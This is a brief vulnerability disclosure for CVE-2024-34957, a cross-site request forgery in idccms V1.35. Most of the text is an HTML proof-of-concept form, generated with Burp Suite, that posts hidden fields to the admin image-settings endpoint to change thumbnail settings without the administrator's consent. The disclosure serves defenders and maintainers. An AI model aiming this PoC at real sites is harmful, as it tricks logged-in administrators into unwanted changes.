CVE-2024-34957

target:http://idccms.com/
version: V1.35

idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component  http://127.0.0.1:80/admin/sysImages_deal.php?mudi=infoSet

POC:
```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:80/admin/sysImages_deal.php?mudi=infoSet" method="POST">
      <input type="hidden" name="dataType" value="" />
			<input type="hidden" name="dataTypeCN" value="%E5%9B%BE%E7%89%87%E7%94%9F%E6%88%90%E8%AE%BE%E7%BD%AE" />
			<input type="hidden" name="backURL" value="http%3A%2F%2F127.0.0.1%2Fadmin%2FsysImages.php%3Fmudi%3DinfoSet%26dataMode%3D%26dataModeStr%3D%26dataType%3D%26dataTypeCN%3D%25E5%259B%25BE%25E7%2589%2587%25E7%2594%259F%25E6%2588%2590%25E8%25AE%25BE%25E7%25BD%25AE%26dataType2%3D%26dataID%3D0%26menuID%3D328" />
			<input type="hidden" name="isDir" value="0" />
			<input type="hidden" name="isThumb" value="true" />
			<input type="hidden" name="thumbW" value="250" />
			<input type="hidden" name="thumbH" value="0" />
			<input type="hidden" name="x" value="57" />
			<input type="hidden" name="y" value="21" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```